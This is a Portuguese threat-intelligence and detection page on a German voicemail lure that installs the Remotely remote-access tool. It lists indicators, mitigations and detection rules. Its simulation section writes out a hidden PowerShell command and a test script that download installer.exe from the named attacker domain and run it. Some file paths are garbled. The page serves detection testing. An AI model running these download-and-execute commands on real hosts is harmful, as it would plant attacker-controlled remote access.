Armadilha do Correio de Voz: Isca de Correio de Voz em Alemão Leva a Acesso Remoto
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Atores maliciosos estão hospedando páginas de destino em alemão de “correio de voz” que atraem os usuários a baixar um arquivo BAT. O script reproduz um áudio enganoso enquanto instala silenciosamente a legítima ferramenta de monitoramento remoto Remotely. Uma vez implantado, o agente RMM oferece ao invasor acesso remoto persistente através de uma infraestrutura C2 controlada pelo invasor.
Investigação
Censys identificou 86 propriedades web comprometidas em domínios *.cadillac.ps distribuindo o arquivo BAT malicioso. O script invoca um instalador PowerShell hospedado em remotely.billbutterworth.com, que obtém um pacote ZIP do Remotely. O arquivo contém os componentes do agente Remotely e um serviço que se instala em C:Program FilesRemotely.
Mitigação
Bloquear os domínios *.cadillac.ps e remotely.billbutterworth.com na camada DNS/proxy. Treinar os usuários a não executarem arquivos BAT inesperados ou copiar/colar comandos PowerShell de páginas desconhecidas. Implantar controles de endpoint para detectar a criação de serviço Remotely e caminhos de instalação suspeitos ou ferramentas não assinadas.
Resposta
Alertar sobre a criação do Remotely_Service e a presença do Remotely_Agent.exe em Program Files. Procurar por voicemail.bat e a atividade do instalador PowerShell associado. Isolar os hosts afetados, coletar artefatos forenses e rotacionar/revogar quaisquer credenciais ou tokens utilizados pelo agente RMM.
Fluxo de Ataque
Detecções
Download ou Upload via Powershell (via linha de comando)
Visualizar
Parada de Serviço de Ransomware Suspeito (via linha de comando)
Visualizar
Powershell Executando Arquivo em Diretório Suspeito Usando Política de Execução de Bypass (via linha de comando)
Visualizar
IOCs (HashSha256) para detectar: Armadilha de Correio de Voz: Isca de Correio de Voz em Alemão Leva a Acesso Remoto
Visualizar
IOCs (HashMd5) para detectar: Armadilha de Correio de Voz: Isca de Correio de Voz em Alemão Leva a Acesso Remoto
Visualizar
Isca de Correio de Voz em Alemão Levando à Instalação de RMM [Servidor Web]
Visualizar
Detecção de Execução de Arquivo BAT de Correio de Voz [Evento de Arquivo do Windows]
Visualizar
Execução de Simulação
Pré-requisito: A Verificação de Pré-voo de Telemetria & Linha Base deve ter sido aprovada.
Racional: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa & Comandos de Ataque:
- Entrega de Phishing: O atacante envia um e-mail com um anexo isca de correio de voz em alemão (HTML) que, quando aberto, redireciona a vítima para
http://bannerbank.cadillac.ps/voicemail.html. - Execução da Página de Destino: A página de destino hospeda um comando PowerShell de uma linha que baixa e executa um instalador de ferramenta de gerenciamento remoto (RMM).
- Criação de Processo: Quando o navegador da vítima processa a página, o PowerShell é invocado com uma linha de comando que explicitamente inclui os dois strings que a regra observa.
- Telemetria Resultante: Os logs do Windows registram o ID do Evento 4688 com um
CommandLinecontendo ambos “página de destino com tema de correio de voz” and “bannerbank.cadillac.ps”, satisfazendo assim a condição Sigma.
O comando exato usado para a simulação:
# Execução maliciosa simulada – contém ambas as strings de gatilho Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'página de destino com tema de correio de voz'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`"" - Entrega de Phishing: O atacante envia um e-mail com um anexo isca de correio de voz em alemão (HTML) que, quando aberto, redireciona a vítima para
-
Script de Teste de Regressão: Um script PowerShell autossuficiente que reproduz o ataque e pode ser executado em qualquer host Windows com o registro necessário ativado.
<# .SYNOPSIS Simula a isca de correio de voz em alemão que aciona a regra de detecção Sigma. .DESCRIPTION Executa uma linha de comando PowerShell contendo ambas as substrings necessárias. #> # Definir strings maliciosas $lureText = "página de destino com tema de correio de voz" $maliciousDomain = "bannerbank.cadillac.ps" # Construir a linha única que aparecerá na linha de comando $payload = @" Write-Host '$lureText'; Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe "@ # Iniciar o PowerShell com a linha de comando criada $psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`"" Write-Host "Lançando comando malicioso do PowerShell..." Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru # Opcional: esperar alguns segundos para garantir o registro Start-Sleep -Seconds 5 -
Comandos de Limpeza: Remover o instalador baixado e quaisquer processos residuais.
# Parar qualquer processo de instalador residual Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force # Excluir o arquivo de instalador temporário $installerPath = "$env:TEMPinstaller.exe" if (Test-Path $installerPath) { Remove-Item $installerPath -Force Write-Host "Limpou $installerPath" }